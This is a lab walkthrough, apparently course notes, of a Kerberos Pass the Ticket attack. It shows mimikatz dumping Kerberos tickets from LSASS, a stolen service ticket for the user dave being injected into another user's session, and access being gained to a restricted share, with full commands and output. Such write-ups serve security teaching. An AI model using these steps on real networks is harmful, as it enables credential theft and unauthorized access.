Pass The Ticket
Recap
Kerberos uses a Ticket Granting Service (TGS) authentication method. The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected elsewhere on the network and then used to authenticate to a specific service.
In this scenario we abuse the already existing session ticket of the user "dave" that exists on the network. We will fetch the ticket with mimikatz and inject the ticket into our current user: "Jen" to access files that are under daves permission.
Attack
To demonstrate the attack angle, we are going to extract all the current TGT/TGS in memory and inject dave's WEB04 TGS into our own session. This will allow us to access the restricted folder.
Verify Jen does not have Access
We can verify that Jen does not have access to the following folder:
PS C:\Windows\system32> whoami
corp\jen
PS C:\Windows\system32> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.
At line:1 char:1
+ ls \\web04\backup
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (\\web04\backup:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Launch Mimikatz
This command parses the LSASS process space in memory for any TGT/TGS, which is then saved to disk in the kirbi mimikatz format.
mimikatz #privilege::debug
Privilege '20' OK
mimikatz #sekurlsa::tickets /export
Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session : Batch from 0
User Name : dave
Domain : CORP
Logon Server : DC1
Logon Time : 9/14/2022 6:24:17 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1103
* Username : dave
* Domain : CORP.COM
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
Target Name (02) : krbtgt ; CORP ; @ CORP.COM
Client Name (01) : dave ; @ CORP.COM ( CORP )
Flags 40c10000 : name_canonicalize ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;1f1626][email protected] !
...
Verify Generated Tickets
We can verify the newly generated tickes by filters out files with the *.kirbi extension
PS C:\Tools> dir *.kirbi
Directory: C:\Tools
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/14/2022 6:24 AM 1561 [0;12bd0][email protected]
-a---- 9/14/2022 6:24 AM 1505 [0;12bd0][email protected]
-a---- 9/14/2022 6:24 AM 1561 [0;1c6860][email protected]
-a---- 9/14/2022 6:24 AM 1505 [0;1c6860][email protected]
-a---- 9/14/2022 6:24 AM 1561 [0;1c7bcc][email protected]
-a---- 9/14/2022 6:24 AM 1505 [0;1c7bcc][email protected]
-a---- 9/14/2022 6:24 AM 1561 [0;1c933d][email protected]
-a---- 9/14/2022 6:24 AM 1505 [0;1c933d][email protected]
-a---- 9/14/2022 6:24 AM 1561 [0;1ca6c2][email protected]
-a---- 9/14/2022 6:24 AM 1505 [0;1ca6c2][email protected]
...
Selecting TGS Ticket
Many tickets have been created, we can select any and inject it through mimikatz
mimikatz # kerberos::ptt [0;12bd0][email protected]
* File: '[0;12bd0][email protected]': OK
Verifying Ticket Injection in Session
Let's verify that we've injected the ticket by entering "klist"
PS C:\Tools> klist
Current LogonId is 0:0x13bca7
Cached Tickets: (1)
#0> Client: dave @ CORP.COM
Server: cifs/web04 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
Start Time: 9/14/2022 5:31:32 (local)
End Time: 9/14/2022 15:31:13 (local)
Renew Time: 9/21/2022 5:31:13 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
Confirming Success
Let's confirm that we've successfully completed the attack by trying to access the folder we initially didn't have permissions for:
PS C:\Tools> ls \\web04\backup
Directory: \\web04\backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2022 2:52 AM 0 backup_schemata.txt
Last updated